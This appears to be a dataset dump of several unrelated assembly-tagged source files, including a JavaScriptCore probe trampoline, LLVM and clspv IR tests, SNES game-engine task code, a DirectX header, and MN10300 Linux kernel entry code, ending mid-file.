; Allocate space for all 4 parameter registers, and align stack pointer to 16 bytes boundary by allocating another 8 bytes.
; The stack alignment is needed to fix a crash in the CRT library on a floating point instruction.
sub rsp, 40
call getHostCallReturnValueWithExecState
add rsp, 40
ret
getHostCallReturnValue ENDP
; The following constants must match the x86_64 version in MacroAssemblerX86Common.cpp.
PTR_SIZE EQU 8
PROBE_PROBE_FUNCTION_OFFSET EQU (0 * PTR_SIZE)
PROBE_ARG_OFFSET EQU (1 * PTR_SIZE)
PROBE_INIT_STACK_FUNCTION_OFFSET EQU (2 * PTR_SIZE)
PROBE_INIT_STACK_ARG_OFFSET EQU (3 * PTR_SIZE)
PROBE_FIRST_GPR_OFFSET EQU (4 * PTR_SIZE)
PROBE_CPU_EAX_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (0 * PTR_SIZE))
PROBE_CPU_ECX_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (1 * PTR_SIZE))
PROBE_CPU_EDX_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (2 * PTR_SIZE))
PROBE_CPU_EBX_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (3 * PTR_SIZE))
PROBE_CPU_ESP_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (4 * PTR_SIZE))
PROBE_CPU_EBP_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (5 * PTR_SIZE))
PROBE_CPU_ESI_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (6 * PTR_SIZE))
PROBE_CPU_EDI_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (7 * PTR_SIZE))
PROBE_CPU_R8_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (8 * PTR_SIZE))
PROBE_CPU_R9_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (9 * PTR_SIZE))
PROBE_CPU_R10_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (10 * PTR_SIZE))
PROBE_CPU_R11_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (11 * PTR_SIZE))
PROBE_CPU_R12_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (12 * PTR_SIZE))
PROBE_CPU_R13_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (13 * PTR_SIZE))
PROBE_CPU_R14_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (14 * PTR_SIZE))
PROBE_CPU_R15_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (15 * PTR_SIZE))
PROBE_FIRST_SPR_OFFSET EQU (PROBE_FIRST_GPR_OFFSET + (16 * PTR_SIZE))
PROBE_CPU_EIP_OFFSET EQU (PROBE_FIRST_SPR_OFFSET + (0 * PTR_SIZE))
PROBE_CPU_EFLAGS_OFFSET EQU (PROBE_FIRST_SPR_OFFSET + (1 * PTR_SIZE))
PROBE_FIRST_XMM_OFFSET EQU (PROBE_FIRST_SPR_OFFSET + (2 * PTR_SIZE))
XMM_SIZE EQU 8
PROBE_CPU_XMM0_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (0 * XMM_SIZE))
PROBE_CPU_XMM1_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (1 * XMM_SIZE))
PROBE_CPU_XMM2_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (2 * XMM_SIZE))
PROBE_CPU_XMM3_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (3 * XMM_SIZE))
PROBE_CPU_XMM4_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (4 * XMM_SIZE))
PROBE_CPU_XMM5_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (5 * XMM_SIZE))
PROBE_CPU_XMM6_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (6 * XMM_SIZE))
PROBE_CPU_XMM7_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (7 * XMM_SIZE))
PROBE_CPU_XMM8_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (8 * XMM_SIZE))
PROBE_CPU_XMM9_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (9 * XMM_SIZE))
PROBE_CPU_XMM10_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (10 * XMM_SIZE))
PROBE_CPU_XMM11_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (11 * XMM_SIZE))
PROBE_CPU_XMM12_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (12 * XMM_SIZE))
PROBE_CPU_XMM13_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (13 * XMM_SIZE))
PROBE_CPU_XMM14_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (14 * XMM_SIZE))
PROBE_CPU_XMM15_OFFSET EQU (PROBE_FIRST_XMM_OFFSET + (15 * XMM_SIZE))
PROBE_SIZE EQU (PROBE_CPU_XMM15_OFFSET + XMM_SIZE)
PROBE_EXECUTOR_OFFSET EQU PROBE_SIZE ; Stash the executeProbe function pointer at the end of the ProbeContext.
OUT_SIZE EQU (5 * PTR_SIZE)
ctiMasmProbeTrampoline PROC
pushfq
; MacroAssemblerX86Common::probe() has already generated code to store some values.
; Together with the rflags pushed above, the top of stack now looks like this:
; rsp[0 * ptrSize]: rflags
; rsp[1 * ptrSize]: return address / saved rip
; rsp[2 * ptrSize]: saved rbx
; rsp[3 * ptrSize]: saved rdx
; rsp[4 * ptrSize]: saved rcx
; rsp[5 * ptrSize]: saved rax
;
; Incoming registers contain:
; rcx: Probe::executeProbe
; rdx: probe function
; rbx: probe arg
; rax: scratch (was ctiMasmProbeTrampoline)
mov rax, rsp
sub rsp, PROBE_SIZE + OUT_SIZE
; The X86_64 ABI specifies that the worse case stack alignment requirement is 32 bytes.
and rsp, not 01fh
; Since sp points to the ProbeContext, we've ensured that it's protected from interrupts before we initialize it.
mov [PROBE_CPU_EBP_OFFSET + rsp], rbp
mov rbp, rsp ; Save the ProbeContext*.
mov [PROBE_EXECUTOR_OFFSET + rbp], rcx
mov [PROBE_PROBE_FUNCTION_OFFSET + rbp], rdx
mov [PROBE_ARG_OFFSET + rbp], rbx
mov [PROBE_CPU_ESI_OFFSET + rbp], rsi
mov [PROBE_CPU_EDI_OFFSET + rbp], rdi
mov rcx, [0 * PTR_SIZE + rax]
mov [PROBE_CPU_EFLAGS_OFFSET + rbp], rcx
mov rcx, [1 * PTR_SIZE + rax]
mov [PROBE_CPU_EIP_OFFSET + rbp], rcx
mov rcx, [2 * PTR_SIZE + rax]
mov [PROBE_CPU_EBX_OFFSET + rbp], rcx
mov rcx, [3 * PTR_SIZE + rax]
mov [PROBE_CPU_EDX_OFFSET + rbp], rcx
mov rcx, [4 * PTR_SIZE + rax]
mov [PROBE_CPU_ECX_OFFSET + rbp], rcx
mov rcx, [5 * PTR_SIZE + rax]
mov [PROBE_CPU_EAX_OFFSET + rbp], rcx
mov rcx, rax
add rcx, 6 * PTR_SIZE
mov [PROBE_CPU_ESP_OFFSET + rbp], rcx
mov [PROBE_CPU_R8_OFFSET + rbp], r8
mov [PROBE_CPU_R9_OFFSET + rbp], r9
mov [PROBE_CPU_R10_OFFSET + rbp], r10
mov [PROBE_CPU_R11_OFFSET + rbp], r11
mov [PROBE_CPU_R12_OFFSET + rbp], r12
mov [PROBE_CPU_R13_OFFSET + rbp], r13
mov [PROBE_CPU_R14_OFFSET + rbp], r14
mov [PROBE_CPU_R15_OFFSET + rbp], r15
movq qword ptr [PROBE_CPU_XMM0_OFFSET + rbp], xmm0
movq qword ptr [PROBE_CPU_XMM1_OFFSET + rbp], xmm1
movq qword ptr [PROBE_CPU_XMM2_OFFSET + rbp], xmm2
movq qword ptr [PROBE_CPU_XMM3_OFFSET + rbp], xmm3
movq qword ptr [PROBE_CPU_XMM4_OFFSET + rbp], xmm4
movq qword ptr [PROBE_CPU_XMM5_OFFSET + rbp], xmm5
movq qword ptr [PROBE_CPU_XMM6_OFFSET + rbp], xmm6
movq qword ptr [PROBE_CPU_XMM7_OFFSET + rbp], xmm7
movq qword ptr [PROBE_CPU_XMM8_OFFSET + rbp], xmm8
movq qword ptr [PROBE_CPU_XMM9_OFFSET + rbp], xmm9
movq qword ptr [PROBE_CPU_XMM10_OFFSET + rbp], xmm10
movq qword ptr [PROBE_CPU_XMM11_OFFSET + rbp], xmm11
movq qword ptr [PROBE_CPU_XMM12_OFFSET + rbp], xmm12
movq qword ptr [PROBE_CPU_XMM13_OFFSET + rbp], xmm13
movq qword ptr [PROBE_CPU_XMM14_OFFSET + rbp], xmm14
movq qword ptr [PROBE_CPU_XMM15_OFFSET + rbp], xmm15
mov rcx, rbp ; the Probe::State* arg.
sub rsp, 32 ; shadow space
call qword ptr[PROBE_EXECUTOR_OFFSET + rbp]
add rsp, 32
; Make sure the ProbeContext is entirely below the result stack pointer so
; that register values are still preserved when we call the initializeStack
; function.
mov rcx, PROBE_SIZE + OUT_SIZE
mov rax, rbp
mov rdx, [PROBE_CPU_ESP_OFFSET + rbp]
add rax, rcx
cmp rdx, rax
jge ctiMasmProbeTrampolineProbeContextIsSafe
; Allocate a safe place on the stack below the result stack pointer to stash the ProbeContext.
sub rdx, rcx
and rdx, not 01fh ; Keep the stack pointer 32 bytes aligned.
xor rax, rax
mov rsp, rdx
mov rcx, PROBE_SIZE
; Copy the ProbeContext to the safe place.
ctiMasmProbeTrampolineCopyLoop:
mov rdx, [rbp + rax]
mov [rsp + rax], rdx
add rax, PTR_SIZE
cmp rcx, rax
jg ctiMasmProbeTrampolineCopyLoop
mov rbp, rsp
; Call initializeStackFunction if present.
ctiMasmProbeTrampolineProbeContextIsSafe:
xor rcx, rcx
add rcx, [PROBE_INIT_STACK_FUNCTION_OFFSET + rbp]
je ctiMasmProbeTrampolineRestoreRegisters
mov rdx, rcx
mov rcx, rbp ; the Probe::State* arg.
sub rsp, 32 ; shadow space
call rdx
add rsp, 32
ctiMasmProbeTrampolineRestoreRegisters:
; To enable probes to modify register state, we copy all registers
; out of the ProbeContext before returning.
mov rdx, [PROBE_CPU_EDX_OFFSET + rbp]
mov rbx, [PROBE_CPU_EBX_OFFSET + rbp]
mov rsi, [PROBE_CPU_ESI_OFFSET + rbp]
mov rdi, [PROBE_CPU_EDI_OFFSET + rbp]
mov r8, [PROBE_CPU_R8_OFFSET + rbp]
mov r9, [PROBE_CPU_R9_OFFSET + rbp]
mov r10, [PROBE_CPU_R10_OFFSET + rbp]
mov r11, [PROBE_CPU_R11_OFFSET + rbp]
mov r12, [PROBE_CPU_R12_OFFSET + rbp]
mov r13, [PROBE_CPU_R13_OFFSET + rbp]
mov r14, [PROBE_CPU_R14_OFFSET + rbp]
mov r15, [PROBE_CPU_R15_OFFSET + rbp]
movq xmm0, qword ptr[PROBE_CPU_XMM0_OFFSET + rbp]
movq xmm1, qword ptr[PROBE_CPU_XMM1_OFFSET + rbp]
movq xmm2, qword ptr[PROBE_CPU_XMM2_OFFSET + rbp]
movq xmm3, qword ptr[PROBE_CPU_XMM3_OFFSET + rbp]
movq xmm4, qword ptr[PROBE_CPU_XMM4_OFFSET + rbp]
movq xmm5, qword ptr[PROBE_CPU_XMM5_OFFSET + rbp]
movq xmm6, qword ptr[PROBE_CPU_XMM6_OFFSET + rbp]
movq xmm7, qword ptr[PROBE_CPU_XMM7_OFFSET + rbp]
movq xmm8, qword ptr[PROBE_CPU_XMM8_OFFSET + rbp]
movq xmm9, qword ptr[PROBE_CPU_XMM9_OFFSET + rbp]
movq xmm10, qword ptr[PROBE_CPU_XMM10_OFFSET + rbp]
movq xmm11, qword ptr[PROBE_CPU_XMM11_OFFSET + rbp]
movq xmm12, qword ptr[PROBE_CPU_XMM12_OFFSET + rbp]
movq xmm13, qword ptr[PROBE_CPU_XMM13_OFFSET + rbp]
movq xmm14, qword ptr[PROBE_CPU_XMM14_OFFSET + rbp]
movq xmm15, qword ptr[PROBE_CPU_XMM15_OFFSET + rbp]
; There are 6 more registers left to restore:
; rax, rcx, rbp, rsp, rip, and rflags.
; The restoration process at ctiMasmProbeTrampolineEnd below works by popping
; 5 words off the stack into rflags, rax, rcx, rbp, and rip. These 5 words need
; to be pushed on top of the final esp value so that just by popping the 5 words,
; we'll get the esp that the probe wants to set. Let's call this area (for storing
; these 5 words) the restore area.
mov rcx, [PROBE_CPU_ESP_OFFSET + rbp]
sub rcx, 5 * PTR_SIZE
; rcx now points to the restore area.
; Copy remaining restore values from the ProbeContext to the restore area.
; Note: We already ensured above that the ProbeContext is in a safe location before
; calling the initializeStackFunction. The initializeStackFunction is not allowed to
; change the stack pointer again.
mov rax, [PROBE_CPU_EFLAGS_OFFSET + rbp]
mov [0 * PTR_SIZE + rcx], rax
mov rax, [PROBE_CPU_EAX_OFFSET + rbp]
mov [1 * PTR_SIZE + rcx], rax
mov rax, [PROBE_CPU_ECX_OFFSET + rbp]
mov [2 * PTR_SIZE + rcx], rax
mov rax, [PROBE_CPU_EBP_OFFSET + rbp]
mov [3 * PTR_SIZE + rcx], rax
mov rax, [PROBE_CPU_EIP_OFFSET + rbp]
mov [4 * PTR_SIZE + rcx], rax
mov rsp, rcx
; Do the remaining restoration by popping off the restore area.
popfq
pop rax
pop rcx
pop rbp
ret
ctiMasmProbeTrampoline ENDP
_TEXT ENDS
END
| {
"language": "Assembly"
} |
/* radare - LGPL - Copyright 2009-2020 - nibble, pancake */
#define R_BIN_ELF64 1
#include "bin_dbginfo_elf.c"
| {
"language": "Assembly"
} |
; RUN: clspv-opt -SplatArg %s -o %t.ll
; RUN: FileCheck %s < %t.ll
; CHECK: [[x_in0:%[a-zA-Z0-9_.]+]] = insertelement <3 x half> undef, half %x, i32 0
; CHECK: [[x_shuffle:%[a-zA-Z0-9_.]+]] = shufflevector <3 x half> [[x_in0]], <3 x half> undef, <3 x i32> zeroinitializer
; CHECK: [[call:%[a-zA-Z0-9_.]+]] = call spir_func <3 x half> @_Z3maxDv3_DhS_(<3 x half> %in, <3 x half> [[x_shuffle]])
; CHECK: ret <3 x half> [[call]]
target datalayout = "e-p:32:32-i64:64-v16:16-v24:32-v32:32-v48:64-v96:128-v192:256-v256:256-v512:512-v1024:1024"
target triple = "spir-unknown-unknown"
define <3 x half> @foo(half %x, <3 x half> %in) {
entry:
%call = call <3 x half> @_Z3maxDv3_DhDh(<3 x half> %in, half %x)
ret <3 x half> %call
}
declare <3 x half> @_Z3maxDv3_DhDh(<3 x half>, half)
| {
"language": "Assembly"
} |
-- DISTRIBUTE_RESULT |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- STREAM_PROJECT |PARTITIONED|
-- STREAM_SELECT |PARTITIONED|
-- STREAM_PROJECT |PARTITIONED|
-- ASSIGN |PARTITIONED|
-- ASSIGN |PARTITIONED|
-- STREAM_PROJECT |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- BTREE_SEARCH |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- STABLE_SORT [$$27(ASC)] |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- STREAM_PROJECT |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- BTREE_SEARCH |PARTITIONED|
-- ONE_TO_ONE_EXCHANGE |PARTITIONED|
-- ASSIGN |PARTITIONED|
-- EMPTY_TUPLE_SOURCE |PARTITIONED| | {
"language": "Assembly"
} |
; RUN: llc < %s -mtriple=thumbv7-apple-darwin -mattr=+thumb2 | FileCheck %s
@b = external global i64*
define i64 @t(i64 %a) nounwind readonly {
entry:
; CHECK: ldrd
; CHECK: umull
%0 = load i64** @b, align 4
%1 = load i64* %0, align 4
%2 = mul i64 %1, %a
ret i64 %2
}
| {
"language": "Assembly"
} |
;**********************************************************************
;* *
;* P R O J E C T : REALITY_ENGINE *
;* *
;* TASKS HANDLING MODULE *
;* *
;**********************************************************************
include rage.i
include rle.i
include gsumac.i
SECTION LEVEL
;
; * * * * * * * INITIALIZE TASKS * * * * * * *
;
dbr ?
dpr 0
_RLInitTasks
mode 'AX!'
lda #0 ; NO TASKS RUNNING!
sta RLNumTasks
tax
ldy #MaxRLTasks-1
_RITS200
lda #-1
sta >_RLTasks,x
txa
clc
adc #rlmSize
tax
dey
bpl _RITS200
rtl
SECTION ENGINE_RAMCODE
;
; * * * * * * * ADD A TASK * * * * * * *
;
; ADD NEW TASK TO TASKLIST
;
; .Y = TaskCode
; .X = TaskData
;
dbr ?
dpr 0
mode 'AX'
__RLAddTaskSNES
jsr _RLAddTaskSNES
rtl
_RLAddTaskSNES
phx ; Save TaskData
phy ; Save TaskCode
ldx #0 ; Offset to TaskData
_RLATS200
lda >_RLTasks,x ; Get TaskCode Address
inc a ; Any CODE Here?
beq _RLATS500 ; No! ReUse this Slot!
txa
clc
adc #rlmSize
tax
jmp _RLATS200
_RLATS500
lda RLNumTasks ; Increment Number of Tasks Running
inc a
sta RLNumTasks
pla ; Save Address of TaskCode
sta >_RLTasks+rlmCode,x
pla ; Save Address of TaskData
sta >_RLTasks+rlmData,x
rts
SECTION ENGINE_GSUCODE
cpu sfx
rTaskPtr equ r10 ; Pointer to RLTask Structure
rTaskCount equ r13 ; TaskCounter
;
; * * * * * * * ADD A TASK * * * * * * *
;
; ADD NEW TASK TO TASKLIST
;
; R9 = TaskCode Address-1
; R8 = TaskData Address
; R11 = Return Address
;
; rTaskPointer = Pointer to TaskStructure.TaskData
;
_RLAddTask
move r0,(<RLNumTasks) ; Get Number of Tasks Running
inc r0
;
ifn DEBUG
move r1,#MaxRLTasks ; Too many tasks?
; from r0
cmp r1
bne .0 ; No, Add this one
HALTGSU #$80
.0
endif
; from r0
sbk
move rTaskPtr,#<_RLTasks ; Pointer to TaskData
_RLAT200
; to r0 ; Get TaskCode Address
ldw (rTaskPtr)
inc r0 ; Any CODE Here?
beq _RLAT500 ; No! ReUse this Slot!
with rTaskPtr
add #rlmSize
bra _RLAT200
nop
_RLAT500
move r0,r8 ; Save Address of TaskData
from r9 ; Save Address of TaskCode
stw (rTaskPtr)
inc rTaskPtr
inc rTaskPtr
jmp r11 ; Return to Caller
; from r0
stw (rTaskPtr)
;
; * * * * * * * REMOVE A TASK * * * * * * *
;
; REMOVE EXISTING TASK FROM TASKLIST
;
; R10 = Pointer to TaskStructure
; R11 = Return Address
;
_RLRemTask
move r0,(<RLNumTasks) ; Get Number of Tasks Running
dec r0
; from r0
sbk
move r0,#-1 ; Disable this Task
jmp r11 ; Return to Caller
; from r0
stw (rTaskPtr)
;
; * * * * * * * DO TASKS * * * * * * *
;
; EXECUTE TASKS IN TASKLIST
;
_RLDoTasks
move rTaskCount,(<RLNumTasks) ; Get Number of Tasks Running
dec rTaskCount ; Any Running Tasks?
bmi _RLDT900
inc rTaskCount
move rTaskPtr,#<_RLTasks ; Pointer to TaskData
;
; >>> HANDLE NEXT TASK <<<
;
_RLDT200
to r9 ; Get TaskCode Address
ldw (rTaskPtr)
inc r9 ; Any CODE Here?
beq _RLDT800 ; No!
;
; >>> CALL TASK CODE <<<
;
link #2 ; Set Return Address
jmp r9 ; Execute TaskCode
nop
_RLDoTasks2
dec rTaskCount ; One More Task Completed
beq _RLDT900 ; No More Tasks to Run!
;
; >>> MOVE TO NEXT TASK <<<
;
_RLDT800
with rTaskPtr ; Move to Next TaskData
add #rlmSize
bra _RLDT200+1
to r9 ; One More Task Completed
;
; >>> FINISHED HANDLING ALL TASKS <<<
;
_RLDT900
ife usePATCH
move r0,#<_RLMSObjects ; HANDLE MOVABLE OBJECTS STATES
endif
ifn usePATCH
move r0,(<PTRLMSObjects) ; HANDLE MOVABLE OBJECTS STATES
endif
move r8,#^_RLMSObjects
ife PROFILE
ljmp r8
endif
ifn PROFILE
stop
endif
nop
| {
"language": "Assembly"
} |
//*********************************************************
//
// Copyright (c) Microsoft. All rights reserved.
// This code is licensed under the MIT License (MIT).
// THIS CODE IS PROVIDED *AS IS* WITHOUT WARRANTY OF
// ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY
// IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR
// PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT.
//
//*********************************************************
#pragma once
#include <agile.h>
#include <algorithm>
#include <collection.h>
#include <concrt.h>
#include <memory>
#include <ppltasks.h>
#include <shcore.h>
#include <string>
#include <sstream>
#include <wrl.h>
#include <wrl/client.h>
// DirectX
#include <dxgi1_6.h>
#include <d3d11_3.h>
#include <d2d1_3.h>
#include <d2d1effectauthor_1.h>
#include <d2d1effecthelpers.h>
#include <dwrite_3.h>
#include <wincodec.h>
#include <DirectXMath.h>
| {
"language": "Assembly"
} |
; RUN: llc < %s -mtriple=x86_64-darwin -mcpu=corei7 | grep movabsq | count 3
define i64 @constant_hoisting(i64 %o0, i64 %o1, i64 %o2, i64 %o3, i64 %o4, i64 %o5) {
entry:
%l0 = and i64 %o0, -281474976710654
%c0 = icmp ne i64 %l0, 0
br i1 %c0, label %fail, label %bb1
bb1:
%l1 = and i64 %o1, -281474976710654
%c1 = icmp ne i64 %l1, 0
br i1 %c1, label %fail, label %bb2
bb2:
%l2 = and i64 %o2, -281474976710654
%c2 = icmp ne i64 %l2, 0
br i1 %c2, label %fail, label %bb3
bb3:
%l3 = and i64 %o3, -281474976710654
%c3 = icmp ne i64 %l3, 0
br i1 %c3, label %fail, label %bb4
bb4:
%l4 = and i64 %o4, -281474976710653
%c4 = icmp ne i64 %l4, 0
br i1 %c4, label %fail, label %bb5
bb5:
%l5 = and i64 %o5, -281474976710652
%c5 = icmp ne i64 %l5, 0
br i1 %c5, label %fail, label %bb6
bb6:
ret i64 %l5
fail:
ret i64 -1
}
define void @constant_expressions() {
entry:
%0 = load i64* inttoptr (i64 add (i64 51250129900, i64 0) to i64*)
%1 = load i64* inttoptr (i64 add (i64 51250129900, i64 8) to i64*)
%2 = load i64* inttoptr (i64 add (i64 51250129900, i64 16) to i64*)
%3 = load i64* inttoptr (i64 add (i64 51250129900, i64 24) to i64*)
%4 = add i64 %0, %1
%5 = add i64 %2, %3
%6 = add i64 %4, %5
store i64 %6, i64* inttoptr (i64 add (i64 51250129900, i64 0) to i64*)
ret void
}
define void @constant_expressions2() {
entry:
%0 = load i64* inttoptr (i64 51250129900 to i64*)
%1 = load i64* inttoptr (i64 51250129908 to i64*)
%2 = load i64* inttoptr (i64 51250129916 to i64*)
%3 = load i64* inttoptr (i64 51250129924 to i64*)
%4 = add i64 %0, %1
%5 = add i64 %2, %3
%6 = add i64 %4, %5
store i64 %6, i64* inttoptr (i64 51250129900 to i64*)
ret void
}
| {
"language": "Assembly"
} |
OpenOaksPC:
call SaveScreenTilesToBuffer2
ld hl, AccessedOaksPCText
call PrintText
ld hl, GetDexRatedText
call PrintText
call YesNoChoice
ld a, [wCurrentMenuItem]
and a
jr nz, .closePC
predef DisplayDexRating
.closePC
ld hl, ClosedOaksPCText
call PrintText
jp LoadScreenTilesFromBuffer2
GetDexRatedText:
TX_FAR _GetDexRatedText
db "@"
ClosedOaksPCText:
TX_FAR _ClosedOaksPCText
TX_WAIT
db "@"
AccessedOaksPCText:
TX_FAR _AccessedOaksPCText
db "@"
| {
"language": "Assembly"
} |
0 $accept : S $end
1 S : error
state 0
$accept : . S $end (0)
error shift 1
. error
S goto 2
state 1
S : error . (1)
. reduce 1
state 2
$accept : S . $end (0)
$end accept
5 terminals, 2 nonterminals
2 grammar rules, 3 states
grammar parser grammar
symbol# value# symbol
0 0 $end
1 256 error
2 40 '('
3 42 '*'
4 38 '&'
5 257 $accept
6 258 S
| {
"language": "Assembly"
} |
###############################################################################
#
# MN10300 Exception and interrupt entry points
#
# Copyright (C) 2007 Matsushita Electric Industrial Co., Ltd.
# Copyright (C) 2007 Red Hat, Inc. All Rights Reserved.
# Modified by David Howells ([email protected])
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public Licence
# as published by the Free Software Foundation; either version
# 2 of the Licence, or (at your option) any later version.
#
###############################################################################
#include <linux/sys.h>
#include <linux/linkage.h>
#include <asm/smp.h>
#include <asm/irqflags.h>
#include <asm/thread_info.h>
#include <asm/intctl-regs.h>
#include <asm/busctl-regs.h>
#include <asm/timer-regs.h>
#include <unit/leds.h>
#include <asm/page.h>
#include <asm/pgtable.h>
#include <asm/errno.h>
#include <asm/asm-offsets.h>
#include <asm/frame.inc>
#if defined(CONFIG_SMP) && defined(CONFIG_GDBSTUB)
#include <asm/gdb-stub.h>
#endif /* CONFIG_SMP && CONFIG_GDBSTUB */
#ifdef CONFIG_PREEMPT
#define preempt_stop LOCAL_IRQ_DISABLE
#else
#define preempt_stop
#define resume_kernel restore_all
#endif
.am33_2
###############################################################################
#
# the return path for a forked child
# - on entry, D0 holds the address of the previous task to run
#
###############################################################################
ENTRY(ret_from_fork)
call schedule_tail[],0
GET_THREAD_INFO a2
# return 0 to indicate child process
clr d0
mov d0,(REG_D0,fp)
jmp syscall_exit
###############################################################################
#
# system call handler
#
###############################################################################
ENTRY(system_call)
add -4,sp
SAVE_ALL
mov d0,(REG_ORIG_D0,fp)
GET_THREAD_INFO a2
cmp nr_syscalls,d0
bcc syscall_badsys
btst _TIF_SYSCALL_TRACE,(TI_flags,a2)
bne syscall_entry_trace
syscall_call:
add d0,d0,a1
add a1,a1
mov (REG_A0,fp),d0
mov (sys_call_table,a1),a0
calls (a0)
mov d0,(REG_D0,fp)
syscall_exit:
# make sure we don't miss an interrupt setting need_resched or
# sigpending between sampling and the rti
LOCAL_IRQ_DISABLE
mov (TI_flags,a2),d2
btst _TIF_ALLWORK_MASK,d2
bne syscall_exit_work
restore_all:
RESTORE_ALL
###############################################################################
#
# perform work that needs to be done immediately before resumption and syscall
# tracing
#
###############################################################################
ALIGN
syscall_exit_work:
btst _TIF_SYSCALL_TRACE,d2
beq work_pending
LOCAL_IRQ_ENABLE # could let syscall_trace_exit() call
# schedule() instead
mov fp,d0
call syscall_trace_exit[],0 # do_syscall_trace(regs)
jmp resume_userspace
ALIGN
work_pending:
btst _TIF_NEED_RESCHED,d2
beq work_notifysig
work_resched:
call schedule[],0
# make sure we don't miss an interrupt setting need_resched or
# sigpending between sampling and the rti
LOCAL_IRQ_DISABLE
# is there any work to be done other than syscall tracing?
mov (TI_flags,a2),d2
btst _TIF_WORK_MASK,d2
beq restore_all
btst _TIF_NEED_RESCHED,d2
bne work_resched
# deal with pending signals and notify-resume requests
work_notifysig:
mov fp,d0
mov d2,d1
call do_notify_resume[],0
jmp resume_userspace
# perform syscall entry tracing
syscall_entry_trace:
mov -ENOSYS,d0
mov d0,(REG_D0,fp)
mov fp,d0
call syscall_trace_entry[],0 # returns the syscall number to actually use
mov (REG_D1,fp),d1
cmp nr_syscalls,d0
bcs syscall_call
jmp syscall_exit
syscall_badsys:
mov -ENOSYS,d0
mov d0,(REG_D0,fp)
jmp resume_userspace
# userspace resumption stub bypassing syscall exit tracing
.globl ret_from_exception, ret_from_intr
ALIGN
ret_from_exception:
preempt_stop
ret_from_intr:
GET_THREAD_INFO a2
mov (REG_EPSW,fp),d0 # need to deliver signals before
# returning to userspace
and EPSW_nSL,d0
beq resume_kernel # returning to supervisor mode
ENTRY(resume_userspace)
# make sure we don't miss an interrupt setting need_resched or
# sigpending between sampling and the rti
LOCAL_IRQ_DISABLE
# is there any work to be done on int/exception return?
mov (TI_flags,a2),d2
btst _TIF_WORK_MASK,d2
bne work_pending
jmp restore_all
#ifdef CONFIG_PREEMPT
ENTRY(resume_kernel)
LOCAL_IRQ_DISABLE
mov (TI_preempt_count,a2),d0 # non-zero preempt_count ?
cmp 0,d0
bne restore_all
need_resched:
btst _TIF_NEED_RESCHED,(TI_flags,a2)
beq restore_all
mov (REG_EPSW,fp),d0
and EPSW_IM,d0
cmp EPSW_IM_7,d0 # interrupts off (exception path) ?
bne restore_all
call preempt_schedule_irq[],0
jmp need_resched
#endif
###############################################################################
#
# IRQ handler entry point
# - intended to be entered at multiple priorities
#
###############################################################################
ENTRY(irq_handler)
add -4,sp
SAVE_ALL
# it's not a syscall
mov 0xffffffff,d0
mov d0,(REG_ORIG_D0,fp)
mov fp,d0
call do_IRQ[],0 # do_IRQ(regs)
jmp ret_from_intr
###############################################################################
#
# Double Fault handler entry point
# - note that there will not be a stack, D0/A0 will hold EPSW/PC as were
#
###############################################################################
.section .bss
.balign THREAD_SIZE
.space THREAD_SIZE
__df_stack:
.previous
ENTRY(double_fault)
mov a0,(__df_stack-4) # PC as was
mov d0,(__df_stack-8) # EPSW as was
mn10300_set_dbfleds # display 'db-f' on the LEDs
mov 0xaa55aa55,d0
mov d0,(__df_stack-12) # no ORIG_D0
mov sp,a0 # save corrupted SP
mov __df_stack-12,sp # emergency supervisor stack
SAVE_ALL
mov a0,(REG_A0,fp) # save corrupted SP as A0 (which got
# clobbered by the CPU)
mov fp,d0
calls do_double_fault
double_fault_loop:
bra double_fault_loop
###############################################################################
#
# Bus Error handler entry point
# - handle external (async) bus errors separately
#
###############################################################################
ENTRY(raw_bus_error)
add -4,sp
mov d0,(sp)
#if defined(CONFIG_ERRATUM_NEED_TO_RELOAD_MMUCTR)
mov (MMUCTR),d0
mov d0,(MMUCTR)
#endif
mov (BCBERR),d0 # what
btst BCBERR_BEMR_DMA,d0 # see if it was an external bus error
beq __common_exception_aux # it wasn't
SAVE_ALL
mov (BCBEAR),d1 # destination of erroneous access
mov (REG_ORIG_D0,fp),d2
mov d2,(REG_D0,fp)
mov -1,d2
mov d2,(REG_ORIG_D0,fp)
add -4,sp
mov fp,(12,sp) # frame pointer
call io_bus_error[],0
jmp restore_all
###############################################################################
#
# NMI exception entry points
#
# This is used by ordinary interrupt channels that have the GxICR_NMI bit set
# in addition to the main NMI and Watchdog channels. SMP NMI IPIs use this
# facility.
#
###############################################################################
